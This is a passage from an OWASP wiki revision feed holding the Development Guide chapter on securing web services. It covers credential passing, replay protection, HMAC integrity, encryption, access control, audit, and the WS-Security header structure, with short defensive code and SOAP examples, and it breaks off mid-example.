&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59466</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59466"/>
				<updated>2009-04-26T11:46:11Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security header’s structure */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader toward the appropriate usage patterns and to warn about potential roadblocks along the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some herald Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, viewing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw: let’s assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable effort to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format – one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and an even more often implemented approach – “we are using SSL to protect all communication, so we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, what follows is just a brief rundown of the most common pitfalls of using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trust) between each pair of communicating nodes along the way. There is also a subtle issue of trust transitivity, as trust between the node pairs {A,B} and {B,C} does not automatically imply an {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received by a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers – in log files (where it can be browsed by anybody) and local caches – aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials and for ensuring the freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server that is semantically equivalent but accepts a different format of the same credentials would require altering the client and prevents forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said, the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach and make a conscious trade-off at design time as to whether channel, token, or combined protection would work best for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to a text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) must be converted to text prior to sending and unambiguously restored upon receipt, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
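A minimal sketch of that conversion, using the JDK’s Base64 codec; the byte values below are illustrative, standing in for DER-encoded certificate bytes:&lt;br /&gt;

```java
import java.util.Arrays;
import java.util.Base64;

// Sketch: Base64 round-trip of a binary token (e.g. DER-encoded X.509
// certificate bytes) so it can travel inside a text-only XML element.
public class TokenEncoding {

    public static String encodeToken(byte[] binary) {
        return Base64.getEncoder().encodeToString(binary);
    }

    public static byte[] decodeToken(String text) {
        return Base64.getDecoder().decode(text);
    }

    public static void main(String[] args) {
        byte[] token = {0x30, (byte) 0x82, 0x01, 0x0a}; // fake DER prefix, not a real certificate
        String wire = encodeToken(token);               // text-safe form for the SOAP header
        System.out.println(wire);                       // prints "MIIBCg=="
        System.out.println(Arrays.equals(token, decodeToken(wire))); // prints "true"
    }
}
```

The decoding step is unambiguous, which is exactly what a receiver needs in order to restore the original certificate or ticket bytes.&lt;br /&gt;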
&lt;br /&gt;
Second, passing credentials carries an inherent risk of their disclosure – either by sniffing them during wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or never sent “in the clear” at all. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
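As an example of the hashing approach, the WSS UsernameToken profile defines a password digest of the form Base64(SHA-1(nonce + created + password)), so the clear-text password never appears on the wire or in server logs. A sketch (the class name is hypothetical):&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;

// Sketch of the UsernameToken password digest from the WSS standard:
//   PasswordDigest = Base64( SHA-1( nonce + created + password ) )
public class PasswordDigest {

    public static String digest(byte[] nonce, String created, String password) {
        try {
            MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
            sha1.update(nonce);
            sha1.update(created.getBytes(StandardCharsets.UTF_8));
            sha1.update(password.getBytes(StandardCharsets.UTF_8));
            return Base64.getEncoder().encodeToString(sha1.digest());
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e); // SHA-1 is present in every JRE
        }
    }

    public static void main(String[] args) {
        // the nonce and created values also help against the replay attacks
        // discussed under message freshness
        System.out.println(digest(new byte[]{1, 2, 3, 4}, "2005-01-27T16:46:10Z", "secret"));
    }
}
```

The server, which knows the password, recomputes the same digest from the transmitted nonce and created values and compares the results.&lt;br /&gt;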
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even one sufficiently protected against tampering, since it is the message itself that is now used for the attack (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages are either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may simply state the instant the message was created, or carry additional information, such as its expiration time or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” where the server's or clients' clocks drift too far apart and prevent timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
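A minimal Python sketch of both defenses – a nonce cache plus a validity window – might look like the following. The five-minute window and the Unix-timestamp wire format are assumptions for illustration; real WSS timestamps are ISO 8601 strings:&lt;br /&gt;

```python
import time

seen_nonces = set()       # identifiers of already-processed messages
MAX_AGE_SECONDS = 300     # assumed validity window of five minutes

def accept_message(nonce, created, now=None):
    """Reject a message if its nonce was seen before (replay)
    or its creation time falls outside the validity window (stale)."""
    now = time.time() if now is None else now
    if nonce in seen_nonces:
        return False          # replayed message
    if now - created > MAX_AGE_SECONDS:
        return False          # stale message
    seen_nonces.add(nonce)
    return True
```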
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “do I trust the caller?” and “did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). Changes may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
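As an illustration of the HMAC approach, the following Python sketch shows how a keyed digest ties a message to a shared secret, so that neither the message nor the digest can be replaced without the key (the key and message content are placeholders):&lt;br /&gt;

```python
import hmac
import hashlib

shared_key = b"key known only to the two parties"   # assumed pre-shared secret
message = b"<Body>withdraw 100 from account 42</Body>"

# The sender transmits the message together with this keyed digest.
tag = hmac.new(shared_key, message, hashlib.sha256).hexdigest()

def verify(key, msg, received_tag):
    """The receiver recomputes the digest; tampering with the message, or
    substituting a digest computed without the key, fails the comparison."""
    expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, received_tag)
```

Unlike a bare checksum, an attacker who alters the message cannot compute a matching replacement tag without the shared key.&lt;br /&gt;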
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities – the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of the IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help in stopping attacks against Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required for audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following standard legal practice, electronic documents now require some form of “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar called the Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces – consisting of messages expressed as XML Schema, and operations – to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, the most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the best-known industry group; it owns many Web-related standards and develops them in a Working Group format. Of particular interest to this chapter are the XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in W3C jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
The Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Its work mostly consists of taking other broadly accepted standards and developing so-called profiles – sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of the software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, which join them to work on a particular issue or proposal. Results of these joint activities, once they reach a certain maturity, are often submitted to standards committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only the HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on the XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
The SOAP protocol, while defining the communication framework, provides no help in securing message exchanges – the communications must either happen over secure channels, or use the protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;) and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications currently being developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with input from Verisign, RSA Security, and other participants, developed a family of specifications collectively known as the “Web Services Roadmap”. Its foundation, WS-Security, was submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still at various stages of development, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al.), trust and security token exchange (WS-Trust), and establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0; work on version 1.1 of the specification is under way and is expected to finish in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile documents, which define the additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as authenticity, integrity, and freshness, and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which methodically applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included in a SOAP envelope and describes the high-level blocks that may appear in a valid security header, plus a set of profile documents. The profile documents have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, and defining relationships left out of the core specification, such as the use of attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (the SOAP message) should not know, nor care, about its envelope (the WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so a minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information which helps secure the message. This means including one or more security tokens (see the Types of tokens section) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
